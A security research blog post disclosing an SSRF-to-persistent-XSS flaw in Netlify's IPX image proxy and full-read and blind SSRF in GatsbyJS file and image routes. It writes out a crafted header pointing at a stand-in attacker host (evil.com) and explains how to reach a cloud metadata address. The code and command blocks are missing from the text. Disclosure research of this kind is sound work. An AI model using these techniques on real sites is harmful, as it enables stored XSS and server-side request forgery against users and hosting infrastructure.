Exploiting Static Site Generators: When Static Is Not Actually Static
Over the last ten years, we have seen the industrialization of the content management space. A decade ago, it felt like every individual and business had a dynamic WordPress blog, loaded up with a hundred plugins to do everything from add widgets to improve performance. Over time, we realised this was a bad idea, as ensuring the security of third-party plugins seemed increasingly impossible.
People aspired to have faster websites, with less security risks. People were tired of trying to improve performance by installing a plugin like W3-Total-Cache and then later realising they were compromised because it had critical vulnerabilities.
Naturally, people started building alternatives to what felt like a broken content management system from a security and performance perspective. Some people started moving to the model of publishing their WordPress blogs in a static manner, but we also saw the rise of static site generators like Jekyll, Hugo, Gatsby and Next.js.
These static site generators promised you performance due to the fact that they did not require server-side processing (unless that was something you really wanted), and the security too, because static sites are supposed to be static right? How are you going to find vulnerabilities in a static site?
But eventually, after the rapid maturity of these static site generators, came CDN/CI platforms such as Netlify and Vercel which brought so many additional features on top of these static sites that people had always longed for. Additionally, some static site generators offered a cloud version of their offerings like Gatsby.
Unfortunately, these additional server-side features that were being offered through these platforms came with the cost that they had to run somewhere, and typically, this was “on the edge”, which is just a fancy way of saying they were ran via the respective platforms on their CDNs as serverless functions.
And now, when most people think about server-side code running on someone elses computer, especially in a serverless context, they rightfully understand that a lot of the server-side risks of compromise are no longer as impactful (i.e. SSRF), but what about the potential client-side issues that may exist?
The rise of these static site generator frameworks also hold a very important place in the Web3 world. My friend Sam Curry and his deep application security research work in the Web3 space was the main reason why I spent so much time looking at these frameworks and platforms in the first place.
You can read about Sam’s take on these issues here, in his blog post you’ll find a few more examples of vulnerabilities in Next.js’s image optimizer as well as the vulnerability we found in Netlify IPX, which we discuss in this blog also.
It all started with this message of Sam showing me some interesting behaviour on www.gemini.com, which is one of the largest crypto exchanges in the world, using Netlify + Next.js to host their website.
This intrigued me as from first glance it looked like there was some functionality built in to both pull and optimize images from remote sources, and it was built directly into Netlify operated websites. This reminded me of Next.js’s native image optimization functionality (found at <span class="code_single-line">_next/image</span>), similar, but different, being something specific to Netlify hosted at <span class="code_single-line">_ipx/</span>.
In Next.js, the image proxy is unable to pull data from remote sources without the domain being within an explicit whitelist (domain or regex), which is typically not populated by default. We thought that this implementation may be similar, so we took a look at the source code for the <span class="code_single-line">@netlify/ipx</span> library.
Thankfully, Netlify had published the source code of this library on their GitHub, and you can find the vulnerable version of the code here.
When auditing the code, we noticed that Netlify’s IPX library also had mechanisms to whitelist remote HTTP sources that could be pulled through this image optimizer proxy. However, glancing at the code a few times, we noticed that the final URL that was constructed and requested was derived from a user-input that Netlify had not considered.
On line 33 of the handler, we can see that the value of the <span class="code_single-line">protocol</span> variable is derived from a user controllable header <span class="code_single-line">x-forwarded-proto</span>:
While this seems benign, it’s worth noting because of the following logic:
The <span class="code_single-line">id</span> variable is derived from the URL path, and a variable <span class="code_single-line">isLocal</span> is declared based on whether or not the <span class="code_single-line">id</span> parameter starts with the literal string <span class="code_single-line">http</span>.
If <span class="code_single-line">isLocal</span> evaluates to true, it constructs a URL to request through the proxy, which unfortunately can easily be tainted through the user-controllable <span class="code_single-line">protocol</span> variable derived from our <span class="code_single-line">x-forwarded-proto</span> header.
By sending a header and value such as <span class="code_single-line">x-forwarded-proto: https://evil.com/?</span>, the constructed URL would request our website, as the <span class="code_single-line">?</span> nullifies the rest of the constructed string.
The even more unfortunate part about this code is that all of the logic checks to determine whether or not a host is whitelisted or not happens in the <span class="code_single-line">else</span> statement, that we are able to skip because <span class="code_single-line">isLocal</span> evaluates to true.
Since the <span class="code_single-line">else</span> code block is skipped, we end up at the following block of code:
The <span class="code_single-line">loadSourceImage</span> function is responsible for downloading the remote resource, as well as caching it to the disk:
As you can see in the logic above, the sink which makes the HTTP request was <span class="code_single-line">fetch</span>, and after the response has been obtained, it is cached to disk.
Now you might be thinking that it’s not all that bad, because, this is an image optimizer right? It should only be allowing image files, what’s the harm in that!
Unfortunately, due to the underlying use of the ipx library, which ultimately depends on the image-meta library, we can see that the SVG type is supported.
As long as the SVG file matches the following regex, the Netlify IPX handler will happily proxy the response and cache it to disk:
As also stated in Sam’s blog, the final proof-of-concept for this vulnerability can be found below:
Where the contents of <span class="code_single-line">malicious.svg</span> looked something like this:
This resulted in persistent cross-site scripting across hundreds of thousands of Netlify websites that were using Next.js.
The impact was widespread, as by default, if you created a Next.js website on Netlify, it would automatically bootstrap the website to use <span class="code_single-line">package = "@netlify/plugin-nextjs"</span> inside the <span class="code_single-line">netlify.toml</span> file, which loads the <span class="code_single-line">netlify/ipx</span> library into your Next.js project.
When building a Next.js website on Netlify with this plugin installed, we can see in the CI/build logs, that the following routes are registered:
After we had determined that the underlying <span class="code_single-line">netlify/ipx</span> library was vulnerable, we started enumerating where else this functionality may have been used.
Now we’ve found a number of vulnerabilities in Netlify’s implementation of the image proxy, but what about the static site frameworks themselves? We decided to take a closer look at the GatsbyJS framework, as we had already spent a lot of time looking at Next.js.
Targeting any proxy-like functionality inside these code bases, we ended up in <span class="code_single-line">gatsby-plugin-utils/src/polyfill-remote-file/http-routes.ts</span> which defined the following routes:
For <span class="code_single-line">/_gatsby/file/:url/:filename</span>, the sink was <span class="code_single-line">await fetchRemoteFile</span>, and for <span class="code_single-line">/_gatsby/image/:url/:params/:filename</span> the sink was <span class="code_single-line">await transformImage</span>.
The first route allows you to proxy any URL, regardless of content type 😱
The second route allows you to only proxy images, this time, SVG’s are not allowed, so the impact is limited to being a blind SSRF vulnerability: <span class="code_single-line">Error: Expected one of: heic, heif, avif, jpeg, jpg, png, raw, tiff, tif, webp, gif, jp2, jpx, j2k, j2c for format but received svg of type string</span>.
In order for these issues to be exploitable, the GatsbyJS server would need to be running. Now, we understand that this is an uncommon configuration as the point of these static site generators … is to actually generate static files that can be hosted.
Nonetheless, these vulnerabilities still pose a real risk to anyone that is running a GatsbyJS server using <span class="code_single-line">gatsby develop</span> instead of hosting the static files or using <span class="code_single-line">gatsby serve</span>.
The full-read server-side request forgery vulnerability in GatsbyJS can be exploited through the following cURL command:
The blind server-side request forgery vulnerability can be exploited via the following cURL command:
The full-read SSRF vulnerability allowed us to hit GatsbyJS’s GCP metadata IP address:
It is important to note that in order to communicate further with the GCP metadata IP address and pull any sensitive information, we must provide a custom header, which is not possible through GatsbyJS’s proxy implementation. Additionally, after discussing with the Gatsby security team, they confirmed that the GCP metadata access is for their Image CDN provider, not Gatsby’s hosting infrastructure.
Upon our routine scans of our customers infrastructure for this vulnerability, we discovered that these vulnerabilities were exploitable in some configurations of GatsbyJS’s cloud product. This led to a number of high-impact high profile cross-site scripting vulnerabilities found on our customer’s attack surfaces.
You can read the official advisory from GatsbyJS regarding these vulnerabilities here: https://www.gatsbyjs.com/blog/vulnerability-patched-in-the-gatsby-cloud-image-cdn/.
More Like This
Ready to get started?
Get on a call with our team and learn how Assetnote can change the way you secure your attack surface. We'll set you up with a trial instance so you can see the impact for yourself.